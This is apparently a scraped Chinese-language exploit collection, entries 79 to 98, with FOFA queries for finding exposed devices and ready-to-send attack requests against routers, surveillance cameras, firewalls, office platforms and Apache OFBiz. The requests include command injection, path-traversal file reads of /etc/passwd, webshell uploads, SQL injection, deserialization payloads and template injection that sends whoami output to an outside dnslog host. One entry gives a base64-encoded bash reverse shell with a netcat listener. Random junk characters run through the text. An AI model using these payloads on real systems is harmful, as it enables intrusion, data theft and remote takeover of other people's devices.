6 r8 ~! ~2 M' E/ m5 yGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1* p! Z; { W, O% b
Host: x.x.x.x
) L+ y- W$ _0 V, S! p; x; v2 [1 B
2 [. n2 N" S( n2 K; `6 ?5 E- }0 e* a& b L7 Y6 X; z
79. BYTEVALUE 百为流控路由器远程命令执行/ k2 E2 a6 s: Q6 z4 e1 I8 z
FOFA:BYTEVALUE 智能流控路由器5 y" p p; o$ T" X* _
GET /goform/webRead/open/?path=|id HTTP/1.1
" k' B( j' ~ m% X1 b" D8 KHost:IP6 M8 z* ?% y/ N8 C' f3 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0- Z; W* n1 T4 e; _- f/ r/ Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: T2 {* h- d! V9 v7 i
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; \+ z0 f7 `0 d* A0 sAccept-Encoding: gzip, deflate7 c9 V" B0 f. C
Connection: close; I" t* W& m$ H8 I2 G/ l7 `$ m
Upgrade-Insecure-Requests: 1
4 x9 @8 v C6 {9 {$ X
I/ F9 b4 f8 W' p$ R' L n6 `- ~! J# C- \- q/ U
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
0 v" K* k3 n8 aFOFA:app="速达软件-公司产品"
( y# v9 Z9 Q& A7 N2 `POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1! p; K" o& S/ |
Host: x.x.x.x
5 W8 G" o0 X& w! r, A- o6 u! QUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15. s x' X: D' T) _1 F
Content-Length: 27
: g" W& `3 j: `! _8 z; V) {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 P! x; G4 m j* X8 ~/ K6 a6 z( WAccept-Encoding: gzip, deflate
" \- G V; p% \% c* T' h5 p, eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; Y9 o6 D. {$ G& V& U. X
Connection: close7 O0 t# A# A* h. a
Content-Type: application/octet-stream1 ] o: M! e- c, l4 J1 e. v B
Upgrade-Insecure-Requests: 1! c/ F" v# c% a+ Q9 L
# e' X' ?) x% @% G! _' L<% out.print("oessqeonylzaf");%>) p) M& T4 I1 w1 X0 o( a
5 _ J$ s0 ]4 [& H. v
8 y5 m3 {0 g# ?7 A q2 N) y% _
GET /xykqmfxpoas.jsp HTTP/1.1& e g ]; ~. h1 \1 g; y; |
Host: x.x.x.x* \- E5 m$ m% r+ H3 g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 y& Q$ A1 W l2 D8 j
Connection: close
) w0 ?( I) P" J7 N( QAccept-Encoding: gzip
) [3 ^& p8 L- C& ]) _ o% M% K
9 t, F( x' y/ {% d9 i) ^5 }) S, @! ~$ d; A
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露- I, ^4 C! A0 S7 P
FOFA:app="uniview-视频监控"+ _' l: y, s% V# O( V; l
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
1 ~( H: H/ Y. s3 v1 E6 ~( `Host: x.x.x.x
, F- a; t8 r, A% z/ KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ o S& D2 @. K) L4 C9 N' }! k1 [Connection: close
1 w x3 w O2 M2 d( ?- UAccept-Encoding: gzip
1 @( }8 o/ h/ x+ V: x2 L+ L p: G, |& i" T; f7 i
6 X& a& M( _% m82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
- t1 W/ k( Q# B; W4 [- _8 JFOFA:app="思福迪-LOGBASE"
H( ]; f* l9 YPOST /bhost/test_qrcode_b HTTP/1.1
) |2 E# c$ H$ WHost: BaseURL
- y- r# w$ M( R0 ]User-Agent: Go-http-client/1.1
7 g6 D7 Y& H, X" dContent-Length: 236 b) A% C- y4 N; C8 S
Accept-Encoding: gzip
' t; N$ r% u2 L) y* u9 J) rConnection: close
6 u7 V* P0 i, g% B( h' b+ bContent-Type: application/x-www-form-urlencoded
5 o; H( q- S0 V! JReferer: BaseURL
# r, s5 G6 f- ]; g# W Y! Y& `
, e2 ^; z8 d4 Z6 @3 i ~7 O* {z1=1&z2="|id;"&z3=bhost
7 \" w" F& z1 I" L3 `$ s+ O8 ?* K D$ N" V9 D6 O P
9 O9 j7 S) m9 O
83. JeecgBoot testConnection 远程命令执行
" A, m& g& Z. eFOFA:title=="JeecgBoot 企业级低代码平台"
' B, q# p2 B0 U3 j1 ~( j: [/ D. u* e; M; t8 Y
P5 G9 j8 g9 R+ c* \; A3 `1 ?POST /jmreport/testConnection HTTP/1.1
- B- P: X) G1 H f- e- }+ \: |( HHost: x.x.x.x6 G" B, e+ E1 |$ V4 w+ P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: \- T) m9 L( w+ E9 f1 d a
Connection: close
, g" P3 X* y+ }, l, zContent-Length: 8881
( z0 _- k# N8 AAccept-Encoding: gzip
" `9 q& A ^" w6 L8 hCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
; c% S! N2 L \7 _Content-Type: application/json3 Q6 @& ^# ~- `7 a
5 c& f5 W B' F; {
PAYLOAD* b5 U9 v4 K- m5 ~8 i0 ?
3 } ~0 c! D* x7 `) N7 A. w4 W. V. ]8 }84. Jeecg-Boot JimuReport queryFieldBySql 模板注入+ [- u+ [9 N$ z% u2 G: {
FOFA:title=="JeecgBoot 企业级低代码平台"& J& { P9 K" a" e
1 ]* W$ e% f! q7 o
6 f1 o$ ~- Q0 D( _% A* u4 c# X: z; H
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
8 R. w- q; O$ f: k, ~! C9 D8 `Host: 192.168.40.130:80806 h% W& |- \" F' q0 _( P( |
User-Agent: curl/7.88.1
2 U3 F1 Y3 z. \6 N. x% HContent-Length: 1567 u2 Q9 S$ o! _6 N' T" M
Accept: */*: G! T6 j: v& ^& _
Connection: close5 b" X: ?1 ?4 B1 h4 ^
Content-Type: application/json
4 I6 v: @! D8 b' J+ c6 |+ F. ?5 }Accept-Encoding: gzip
+ U% Q& Q# W1 K! a! W& O* ~- b: d; T2 Z+ {3 ~- O6 S
{2 y: W6 W( p; t P: a* R6 n
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",) c+ x' ?+ {8 u9 b
"type": "0"; V' @7 K- `. a
}. Y6 {; X8 X0 P; a; V1 f! H
. i! R+ G% A+ @& t, `
" A* a4 r$ U4 c8 b1 D- `, p
85. SysAid On-premise< 23.3.36远程代码执行
$ k }) r8 ^7 o1 f/ mCVE-2023-47246
6 r# E5 F) v1 _; }9 l/ h2 l3 EFOFA:body="sysaid-logo-dark-green.png"
1 b3 O- v/ I# j" V* a# O) H' ]EXP数据包如下,注入哥斯拉马7 S- q9 F8 h: j8 D& N N
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.16 M$ ^/ r3 c: c. W) v6 j! _4 }5 S" t" a! N
Host: x.x.x.x; r) U, y9 N! w4 a, h- i- H: [: c& B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ Q" e, z5 v4 S z' I
Content-Type: application/octet-stream3 ] n1 A, P# p- {( \' a2 }# v$ P
Accept-Encoding: gzip
" e8 W e9 _7 y& F7 V
+ Q* h- K. C/ ]- h4 z4 I5 b9 bPAYLOAD) F7 W7 c' @+ f5 _9 X( J
: j1 I7 Q* U% R) L8 d/ l4 N
回显URL:http://x.x.x.x/userfiles/index.jsp
' H: O4 j6 D1 c7 ^$ D+ _/ m, s: Q/ _* o4 u& Y7 c
86. 日本tosei自助洗衣机RCE
/ X+ t3 O0 C, \+ d! TFOFA:body="tosei_login_check.php"
+ M) W! \; N9 b0 r; m: `3 JPOST /cgi-bin/network_test.php HTTP/1.1# s2 M, G2 r5 Y$ l: s
Host: x.x.x.x N5 H C/ X$ r/ C# X8 x9 W; H
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.361 }9 k0 S0 o! ^0 n
Connection: close3 x, c, l' o& P* T+ K
Content-Length: 44/ Z" P& C% W! V; {
Accept: */*. E, h; v9 A0 P8 d
Accept-Encoding: gzip
7 t+ |" F( p& J5 K7 H! }* wAccept-Language: en
' M* b/ N) z1 @Content-Type: application/x-www-form-urlencoded
5 N q$ p* b/ A. D% b, L
( [0 y8 R) A# k* yhost=%0acat${IFS}/etc/passwd%0a&command=ping% ]& k% G( b; P* a; U- F: ^
" b0 \, v1 H4 S, r1 G8 w8 W" Z+ P% z+ |( U" g! |; r" p
87. 安恒明御安全网关aaa_local_web_preview文件上传
& [ z3 m+ i8 z$ |6 Q, M5 c3 ~FOFA:title="明御安全网关"$ j, m: p. q+ `5 h
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
1 E6 h, g5 r% l V# vHost: X.X.X.X
+ w8 m9 a& F. |1 I+ bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 m9 y3 U% O% q0 T9 @Connection: close
' t3 v, G+ g( {$ n5 Q9 jContent-Length: 198+ C$ l6 [/ o/ E. g1 Q' s/ m4 E
Accept-Encoding: gzip* @$ I$ s6 M2 k
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
, G4 ^& L# m) q- b* r3 o$ G( B8 U6 o% s6 G. \. H
--qqobiandqgawlxodfiisporjwravxtvd
( }7 }, T* V5 P) U4 i! Q8 i+ OContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"
# h' p. c4 t6 tContent-Type: text/plain" S- L0 @8 K3 U
$ w/ x. u5 j& A) |; Q. |5 N5 Q2ZqGNnsjzzU2GBBPyd8AIA7QlDq4 E: s" i- m# C+ d) [
--qqobiandqgawlxodfiisporjwravxtvd--8 B/ ~: r' a; t! R: T8 @
/ I0 P# J0 ~% y$ C- }
6 n+ Z, T9 z2 `8 h" G0 P8 e/jfhatuwe.php9 r; [6 E8 o5 H! C* H* X' Q
3 n3 k- {" q4 ]/ J g
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
: P0 A( h& d- k# A6 oFOFA:title="明御安全网关"
7 a6 R% Q! |3 k5 H, ~4 N* NGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
4 s7 }9 y" S# ^Host: x.x.x.xx.x.x.x
: ?" P, Q& K! v3 NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ m4 U. P& ~; [+ D7 e+ l# ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 j9 R( r' E8 c i' H! v+ XAccept-Encoding: gzip, deflate7 ?7 p0 q6 |9 d0 f( i
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
f' o! W4 o1 m" \* QConnection: close# E. B4 D) w! z' y( f
7 L; w, ^( S' h. Y& z4 |7 ]
0 D" a$ B* ?& A4 {% S& u/astdfkhl.php
9 V" V/ i) l( `$ k/ R& l
/ z; p5 l- n" ?7 f4 ]89. 致远互联FE协作办公平台editflow_manager存在sql注入% n7 F) P/ U" v; V$ N; W
FOFA:title="FE协作办公平台" || body="li_plugins_download"! W5 C! @" t8 q& \. s, O4 R: a! S0 S1 ]
POST /sysform/003/editflow_manager.js%70 HTTP/1.16 Y& B. ^9 e) g1 W5 n5 e
Host: x.x.x.x
0 U# |+ ?9 t9 [ T1 w5 m6 PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- n6 y u' U! z+ t/ q
Connection: close
7 o% X u/ y f9 E, \4 T' kContent-Length: 41
# p' h3 l2 |, R' J8 C4 \7 aContent-Type: application/x-www-form-urlencoded4 s9 k& b! @$ M8 E
Accept-Encoding: gzip% l$ G3 v* N$ e$ l$ a: i6 c7 F. K
: u# R# X5 M7 a9 E3 K+ v% T" T! soption=2&GUID=-1'+union+select+111*222--+
: K6 D7 G9 D8 V7 u/ ]* f
6 c+ R+ f0 D6 \7 h
0 k( Y/ i; g' I0 S) N& g: p3 M0 k90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
: r; D% {1 B- b3 KFOFA:icon_hash="-1830859634"1 z. |4 M* E; B5 ?5 [
POST /php/ping.php HTTP/1.1
! z2 K' `# i% z7 E n! KHost: x.x.x.x
- D+ K' c5 ]3 B4 oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
4 ~# U$ t& ?& o/ C8 CContent-Length: 51
& e* Q. f5 k8 r9 |; ~( hAccept: application/json, text/javascript, */*; q=0.01, [4 v! T9 H4 d. A+ b7 K) q
Accept-Encoding: gzip, deflate
: ?1 p. O: O. n4 cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 i. F) z9 J" Q: b# XConnection: close
* W5 c7 f8 v4 p9 e( w. `; F3 o7 hContent-Type: application/x-www-form-urlencoded
4 |* B% o" U- N) z3 _7 fX-Requested-With: XMLHttpRequest% _* w" q' k( L7 j- a! r8 s
4 _& D- z" V3 r: J
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig3 `0 C: s! N( j- Q' {: _; h
2 v. @! d4 t6 G1 w# p5 s# v5 q) r
+ s0 W! M n( x' o
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取6 g7 V1 i& _, [: I6 S8 h
FOFA:title="综合安防管理平台", v- W) B O) X4 P& M9 V/ o k
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.14 k% \* J+ U# ^* R" F! h9 p
Host: your-ip9 U2 F' I* y* Q; ?: A+ S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36$ R5 u2 b( b% e! R4 I1 d+ v
Accept-Encoding: gzip, deflate
# {0 {/ o: A3 W) b/ |Accept: */*
, \, d$ J7 X/ l- L# MConnection: keep-alive3 ~/ ]) ]; a+ o3 W7 J3 z
* R7 ?7 m# D" q; z' \
0 G* a0 w) x' l, U- Z( j
9 c& _! K3 Z0 q: f8 i Y0 }4 V92. 海康威视运行管理中心session命令执行
5 A: L5 t* H, ~! l: w) YFastjson命令执行2 u6 W, Y A6 b, |0 l& w7 D
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76". m! [' v S1 x0 |8 _) L7 L
POST /center/api/session HTTP/1.1
+ f, D4 i6 ~+ \: q MHost:
) d2 ^* C8 X9 Y% G) G5 D% g9 eAccept: application/json, text/plain, */*
0 j7 @2 o7 [8 Y, c/ s( Y3 A! G" DAccept-Encoding: gzip, deflate
/ m9 H' X. t7 t$ c6 x/ SX-Requested-With: XMLHttpRequest
+ m0 ]% S- w& c7 D! a3 W) ^Content-Type: application/json;charset=UTF-8
+ z. `3 @. \! X" `1 c& B/ nX-Language-Type: zh_CN
6 U; K7 W3 \+ B7 N2 ~9 WTestcmd: echo test
3 D3 i0 }: L! qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36; v3 H5 O# E2 r' k
Accept-Language: zh-CN,zh;q=0.9
7 s; U2 {9 b1 N7 ?) d0 X. ~* n/ VContent-Length: 5778) h6 ]* L# x' v. `$ S
& ^( T' [( j4 b' u+ X9 H) ]4 cPAYLOAD
. T, a2 z- i- U \7 J; Y& k7 ~6 V+ [( V% i( G9 W" f" ]
4 d6 m2 y% R4 ]6 g( k
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传( J1 E" _2 s7 Y9 g6 s7 ~
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="/ n# I& b5 g5 p8 ^& B1 V
POST /?g=app_av_import_save HTTP/1.1
& _& @2 M( u: M+ ~8 LHost: x.x.x.x
8 y9 r2 Q/ z7 I! N$ v/ y7 OContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
8 \: I$ H, \, i2 `$ X% P( i: gUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
. }( c4 }5 R: \% E
. o" `) h9 o4 m+ R: |# J2 y+ _" O7 P------WebKitFormBoundarykcbkgdfx4 E. A# O! n# U4 G; z
Content-Disposition: form-data; name="MAX_FILE_SIZE"
$ n. e& e7 K0 _6 }4 g( u4 D, a8 V ~2 b2 I3 M
10000000
2 ~- L/ E* k: i9 M( l8 J$ u------WebKitFormBoundarykcbkgdfx( K( }( g# O# V7 }* `) n
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
7 n+ o9 |5 k( m# ?! D; i& @Content-Type: text/plain
7 g9 ^' u, t8 _' q: A& }. M! a) b% ~, Q- C+ t# s6 Q3 L
wagletqrkwrddkthtulxsqrphulnknxa
* V) {1 b1 i2 Y% @# A& z. \8 a------WebKitFormBoundarykcbkgdfx
( o. V$ }9 p; V# |1 uContent-Disposition: form-data; name="submit_post", S8 n" s R; o M: |* ~
. y& Y# u1 w1 Y7 c3 hobj_app_upfile
2 l8 l7 u& i+ q+ V. G0 B, L- O------WebKitFormBoundarykcbkgdfx
" Q. J. I. g& O* E( X' |Content-Disposition: form-data; name="__hash__") U4 V! @3 R, x/ Q/ L- B W0 u
1 \$ i- Q( u# Y2 f. |8 m
0b9d6b1ab7479ab69d9f71b05e0e9445
+ \# J3 [5 x' U9 i+ q------WebKitFormBoundarykcbkgdfx--
+ N; L2 U- u8 y* K
8 j' p* q5 }' A$ ~4 b; ]0 ~5 ?- \! K4 b2 ^
GET /attachements/xlskxknxa.txt HTTP/1.1& u: c0 v3 n" I k3 U
Host: xx.xx.xx.xx; P3 F6 B. i6 x/ I8 f2 J* |
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36% W2 p/ J- R A c4 }9 Y* H# [
! ~* ]" G9 S% i! J v0 d& D! H! [- X. Z! p: X" u7 C
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
% x6 n! C9 f% j% G1 hFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
; L& [: T9 R6 K7 e- j) sPOST /?g=obj_area_import_save HTTP/1.1+ h6 j# K1 L! Q' {
Host: x.x.x.x
! T: _9 `9 e5 t: B9 j" |9 Q/ ]Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt9 Q/ n; Y- x, @$ w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.361 I% h( N! A F$ L% A' o, k
5 p$ d1 L3 A' {( [, G4 S------WebKitFormBoundarybqvzqvmt
$ o. [' ]7 a. kContent-Disposition: form-data; name="MAX_FILE_SIZE"9 C9 M" F0 V g# u! i; M
0 ?5 K8 |- j# ]. U" B
10000000. _/ z3 l7 e6 y
------WebKitFormBoundarybqvzqvmt
: g) } F9 E( u( M3 vContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt") e7 `2 @! S) N6 B4 b
Content-Type: text/plain, S) [$ N$ {! t! t
" I% a, N0 u4 ?+ ]: |- Ypxplitttsrjnyoafavcajwkvhxindhmu
) S" y' \" G9 _0 F------WebKitFormBoundarybqvzqvmt
: R( h5 I* W- [Content-Disposition: form-data; name="submit_post"
8 J/ R8 }5 H1 ~( O, s7 a% m2 R2 \9 F
" m) q5 U% J9 Z( Eobj_app_upfile3 D, x8 m% v7 A) Z
------WebKitFormBoundarybqvzqvmt+ n g9 f4 B+ d; p
Content-Disposition: form-data; name="__hash__"* P& v( d9 S) C5 ]- r6 ^" m
: W& y8 X, v: U% D0b9d6b1ab7479ab69d9f71b05e0e9445
. q. U( b. b# W! Y# s------WebKitFormBoundarybqvzqvmt--
. P3 F% W4 Q" ~5 N! u7 }4 p6 ]: h% C$ C% t0 L
8 e: i9 Y$ D6 A! z8 R( E
" ]+ _1 l6 m( w& \7 C- c* k: |1 T
GET /attachements/xlskxknxa.txt HTTP/1.1) j; z, v6 \0 h9 ~* H& O
Host: xx.xx.xx.xx
2 G: k1 B# p, SUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
7 k0 s( f, V/ b& q5 O) h
% C) | p( L% e% | v! m4 r$ |& a+ }' P8 Y, n
1 x9 h! X5 H1 Z8 K( A
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
1 D& v$ p# o6 u& z2 `* |& {CVE-2023-49070
# a7 a' |1 @1 y9 u8 I$ AFOFA:app="Apache_OFBiz"
5 K* x( k5 T' M- j% x6 }POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.13 l7 m- k% s' h% E& F) Q3 {8 L
Host: x.x.x.x7 _3 A; s/ @- Q9 D# m+ U) P
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
4 ]/ S6 f: C8 A8 u0 V H, ZConnection: close2 W5 [7 j! J0 J
Content-Length: 889# b4 p/ t6 F4 q3 {9 C
Content-Type: application/xml/ }4 r4 }6 k3 F' ?% U" q/ d, Y
Accept-Encoding: gzip/ X! @& y- n2 G7 }
/ f; @* i# ], e3 G
<?xml version="1.0"?>
' T8 @. c7 s" S, f! x. g<methodCall>
( |! t* ^: G d. q0 _1 w' h) g" | <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
/ }: S0 u% _& {6 B9 Q2 u9 C <params>
5 z! d8 E$ T# @7 S! ^ s0 Q, M0 z* p1 R( u <param>
7 R( ?# O$ ?% p <value>
, ^& ~2 q+ b! O5 z2 E2 {2 a, o <struct>6 k. e9 l3 B i4 V- F
<member>
% {5 O# F! Y5 a% B$ f+ G" w <name>test</name>% b7 a; P% q+ S( w! |4 V1 V
<value>1 T2 G0 F! F- D3 u
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>$ k$ Q$ _$ y! D8 W- N) X: D
</value>+ J8 T& j. T7 a! P% O8 |
</member>9 L: b+ M" U- Z* P8 J1 L" @0 o
</struct>) q- Z% C( m+ D* O" e8 E* A# M6 j
</value>2 N( u q9 h# e
</param>
% j: ?! ^6 F$ L& M+ P/ ] </params>6 X n& l3 J" z( q$ N
</methodCall>
, o1 m) d- t* k6 R4 L7 F+ i3 _" m7 Q6 q& a+ E% f
% W0 c, S( p1 y4 K5 ^/ [8 M用ysoserial生成payload
7 c& S7 M+ H0 x: F) S' jjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
5 _) y0 a3 @8 f! O; W7 p1 ]/ u: h2 V' m
) y* F% b. X5 u: ?) W9 t. m7 \/ z! u
将生成的payload替换到上面的POC
: j0 l, E! B3 E7 _, oPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.13 p% O3 H+ H7 {" m
Host: 192.168.40.130:8443, d! j* k- G% r* i* z+ r
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
$ j( d! D( p- `. u! Q) `2 aConnection: close: ~- y- y; h* @- ?
Content-Length: 889
( n3 c& ? B9 RContent-Type: application/xml& w1 C; c& E0 ]4 v, j
Accept-Encoding: gzip% U/ `) x, U, X: I8 f5 P) ]
, r( R" N0 L, J/ n7 v& C
PAYLOAD
0 j. O" s/ P( j* M; W6 |* _; o& w" ]. u
96. Apache OFBiz 18.12.11 groovy 远程代码执行 \% g5 B7 E. I2 r- o
FOFA:app="Apache_OFBiz"! D4 W& S7 @3 O% }0 b+ U4 f
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
# m5 M+ J. N& Z8 j2 d; NHost: localhost:84431 P' q& E; K& r3 B! G& K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
" l+ f/ x! A$ s5 e$ qAccept: */*$ k9 E! t7 f1 n# v, A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' L; g+ f; |: A* ?: N# ~Content-Type: application/x-www-form-urlencoded
" g" a f8 b; UContent-Length: 55
9 N6 z% q9 Q- }8 M1 \
; p& Z3 O, R: j# J- l# T7 WgroovyProgram=throw+new+Exception('id'.execute().text);
3 T) f- C5 L, {6 w3 w9 n0 K( Q
" F1 w# z) I8 V8 b$ D5 {% t( w" {% @5 U5 s9 U6 M+ X
反弹shell# E" r% I7 w$ E6 {9 j
在kali上启动一个监听
$ e2 P' }, ?; }) X/ o# J0 \. Gnc -lvp 7777+ e8 t* z9 a9 T5 t0 _) V, j
! T4 s) i$ n- A+ \$ rPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1( t" F2 W3 d- `. N) C+ o# O) q" G
Host: 192.168.40.130:8443
# e+ @; L, A$ }5 d. SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
1 k, B7 z6 q6 XAccept: */*# R# _6 P0 l0 X, P" o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 B. p- j! C K8 F* UContent-Type: application/x-www-form-urlencoded
- {9 c1 @' J; K: Y) AContent-Length: 71
: D( q( j- T* C" C. a( L! U% J6 J
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
; [$ ?+ X) h; Z. n9 y- q0 \" T3 K1 P# q
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行% r, _; Q$ ~/ |9 w: c% m
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
) o) J' u _ }! B/ \; RGET /passport/login/ HTTP/1.1
' y7 Y& A5 S' K% j6 v/ R; [4 ZHost: 192.168.40.130:8085
# [) y; H N @' l" LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& s/ W: R. @0 i0 oAccept-Encoding: gzip
" C8 f c. u* @& UConnection: close
u$ I4 S& o7 W& w' tCookie: rememberMe=PAYLOAD/ o% T, S0 v2 m( \' L% E( J, h8 k
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
W& t# n/ p9 h% z) d+ ]( `
" Y: g0 a% g3 Y3 R" a; t: p+ P8 o
5 f1 @2 ~/ E% [3 B) c98. SpiderFlow爬虫平台远程命令执行
: f6 U& R2 E5 C$ hCVE-2024-0195
6 N4 p/ U$ M3 q1 Z1 b/ ]6 VFOFA:app="SpiderFlow". s9 x# W* ]# C
POST /function/save HTTP/1.1
5 v3 B# Q7 n- W, A& l1 l; sHost: 192.168.40.130:8088
0 o9 v+ k) `* ~0 L m8 o3 |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
! ?1 \6 `+ N( E# X2 ~2 w5 Q/ UConnection: close; C/ q. |+ t* [
Content-Length: 1210 r! k r0 {4 S) B$ x
Accept: */*/ V2 j! A, G- ^; l2 |3 ^( T; Y
Accept-Encoding: gzip, deflate4 p% P: E* O Q9 n- y+ v$ H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 t p3 P. H6 V6 V7 t; J! uContent-Type: application/x-www-form-urlencoded; charset=UTF-8
